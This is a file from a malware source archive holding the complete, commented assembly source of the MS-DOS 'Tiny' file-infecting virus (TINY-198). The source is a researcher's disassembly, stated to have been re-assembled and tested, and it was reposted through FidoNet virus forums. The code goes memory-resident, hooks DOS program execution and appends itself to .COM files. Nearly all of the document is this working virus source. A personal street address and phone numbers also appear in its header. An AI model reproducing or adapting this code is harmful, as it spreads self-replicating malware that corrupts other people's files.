MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.vir31.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

232 lines
6.6 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 21 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_198.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:40)
;* To : Gilbert Holleman
;* Subj : TINY_198.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
page ,132
name TINY198
title The 'Tiny' virus, version TINY-198
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-198 ú
; ú Disassembled by Vesselin Bontchev, July 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-v_entry
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
v_entry:
call self ; Determine the start addres of the virus body
self:
pop si
sub si,3
push ax ; Save AX (to keep programs as DISKCOPY happy)
; Check whether the virus is already in memory and just run the program if so:
mov ah,0E9
int 21
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len ; CX := virus length
rep movsb ; Move the virus body there
; Transfer control to cont: by PUSHing its address
; on the stack and executing RETF:
push es
mov ax,cont-v_entry+seg_60
push ax
retf
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
; Resume execution from here (but already in segment 60h):
cont:
; Install new INT 21h handler and move the old one at INT 32h:
mov di,21*4
mov cl,2
mov ax,int_21-v_entry+seg_60
cld
lp:
push word ptr es:[di] ; Get old handler's address
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
stosw ; Install the new one
mov ax,cs
loop lp ; Loop until done
; Save the original first 4 bytes of the infected program on the stack:
push word ptr cs:[first4-v_entry+seg_60]
push word ptr cs:[first4+2-v_entry+seg_60]
run_pgm:
mov di,offset start ; Point DI at program's start
pop word ptr [di+2] ; Restore the first 4 bytes of the program
pop word ptr [di]
pop ax ; Restore the original value of AX
push ds
push ds ; ES := DS
pop es
push di ; Push 100h on the stack
retf
mem_chk:
; Push the original first 4 bytes of the infected program on the stack:
push word ptr [si+first4-v_entry]
push word ptr [si+first4+2-v_entry]
jmp run_pgm ; And run the original program
int_21: ; New INT 21h handler
cmp ah,0E9 ; Memory check?
je mem_chk ; If infected, run the original program
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
mov bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,first4-v_entry+seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
sub ax,3 ; Subtract 3 (first instruction length)
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
;-+- FMail 0.96â
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/iPATH Search PATH for include files
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)